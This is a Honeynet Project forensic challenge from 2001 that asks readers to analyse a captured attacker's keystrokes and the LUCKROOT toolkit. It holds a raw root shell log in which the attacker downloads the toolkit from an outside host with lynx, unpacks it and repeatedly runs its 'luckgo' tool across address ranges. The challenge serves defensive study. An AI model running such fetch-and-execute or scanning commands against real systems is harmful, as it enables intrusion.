# # SCAN OF THE MONTH #13: March, 2001 # # Challenge to see who can determine which tool was used # and the purpose of this attack. # # The packets were captured from the wild as part of the # Honeynet Project, http://project.honeynet.org In the past two months, the Honeynet Project has identified a great deal of aggressive activity from members of the Romanian blackhat community. On 5 Jan, 2001 a Linux honeypot was compromised by one of these members. On 8 Jan, 2001, the attacker's keystrokes were captured and forwarded to a secured syslog server. Your job is to analyze these keystrokes and the tool LUCKROOT.TAR. Based on your research, you should be prepared to answer the questions set forth by the challenge. You can download LUCKROOT.TAR from the URL below. WARNING: you will be analyzing a toolkit captured in the wild; this tool set was created by the blackhat community for malicious purposes. Only use a system dedicated for such analysis, and treat the archive as hostile: the captured session below shows it being unpacked and executed as root (UID=0), so extract and run it only inside an isolated, snapshotted analysis host. Do not run this toolset while connected to a network. 
You have been warned :) http://project.honeynet.org/scans/scan13/LUCKROOT.TAR Jan 8 18:47:52 honeypot -bash: HISTORY: PID=1246 UID=0 cd .mail Jan 8 18:48:00 honeypot -bash: HISTORY: PID=1246 UID=0 cd /usr/sbin/.mail Jan 8 18:48:12 honeypot -bash: HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 honeypot -bash: HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 honeypot -bash: HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 honeypot -bash: HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 honeypot -bash: HISTORY: PID=1246 UID=0 .luckgo 216 200 Jan 8 18:52:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 200 Jan 8 18:54:37 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:55:26 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 63 1 Jan 8 18:56:06 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 10 Jan 8 19:06:04 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 120 Jan 8 19:07:03 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 64 1 Jan 8 19:07:34 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:09:41 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 194 1 Jan 8 19:10:53 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 216 1 Jan 8 19:12:13 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 210 128 Jan 8 19:23:30 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 24 1 Jan 8 19:35:55 honeypot -bash: HISTORY: PID=1246 UID=0 ./luckgo 12 20